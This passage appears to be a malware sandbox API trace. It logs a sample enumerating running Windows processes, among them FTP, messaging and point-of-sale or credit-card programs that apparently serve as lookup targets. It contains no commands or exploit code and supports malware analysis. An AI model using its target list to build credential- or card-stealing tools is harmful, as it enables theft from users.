1 [0136.294] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0136.295] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0136.296] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0136.296] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0136.297] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0136.298] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0136.299] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0136.299] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0136.300] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0136.301] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0136.301] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0136.302] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0136.303] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0136.304] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0136.305] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0136.306] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0136.306] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0136.307] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0136.308] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0136.308] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0136.309] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0136.310] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0136.310] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="kentucky-phrases-casual.exe")) returned 1 [0136.311] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="breaking.exe")) returned 1 [0136.312] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="enforcement_wv_transmitted.exe")) returned 1 [0136.313] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="friend.exe")) returned 1 [0136.314] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0136.314] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0136.315] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.316] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.317] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0136.317] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.318] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.319] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin.exe")) returned 1 [0136.320] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb10, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin1.exe")) returned 1 [0136.321] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="5.exe")) returned 1 [0136.322] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xab8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0136.322] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0136.323] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0136.324] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4fc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OqRoSnESYXcDITEx.exe")) returned 1 [0136.325] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0136.325] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0136.326] CloseHandle (hObject=0x344) returned 1 [0136.326] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97b30 | out: hHeap=0x6c90000) returned 1 [0136.326] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x6c97b30 [0136.326] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x344 [0136.330] Process32First (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.331] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0136.331] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0136.331] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.332] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0136.332] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.333] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0136.333] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0136.334] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0136.335] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0136.335] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.336] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.336] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.337] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.337] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.338] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0136.338] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.339] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.339] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0136.340] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0136.340] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0136.341] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.341] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.342] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0136.342] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="herb cos completed.exe")) returned 1 [0136.343] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x71c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="dealers.exe")) returned 1 [0136.343] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="hall-stronger.exe")) returned 1 [0136.344] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rp-hip.exe")) returned 1 [0136.345] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="karma_coat.exe")) returned 1 [0136.345] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="plenty_leather.exe")) returned 1 [0136.345] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrytrackbackspatent.exe")) returned 1 [0136.346] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="busy.exe")) returned 1 [0136.346] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sudan_territory.exe")) returned 1 [0136.347] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="catalogs intelligent.exe")) returned 1 [0136.347] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="prisonermounted.exe")) returned 1 [0136.348] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extensive.exe")) returned 1 [0136.348] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="posters-baker-lift.exe")) returned 1 [0136.349] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="emperor_respected.exe")) returned 1 [0136.349] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="illinois indicated regional.exe")) returned 1 [0136.350] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="apartmentscontemporary.exe")) returned 1 [0136.350] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="witch-feat.exe")) returned 1 [0136.351] Process32Next (in: 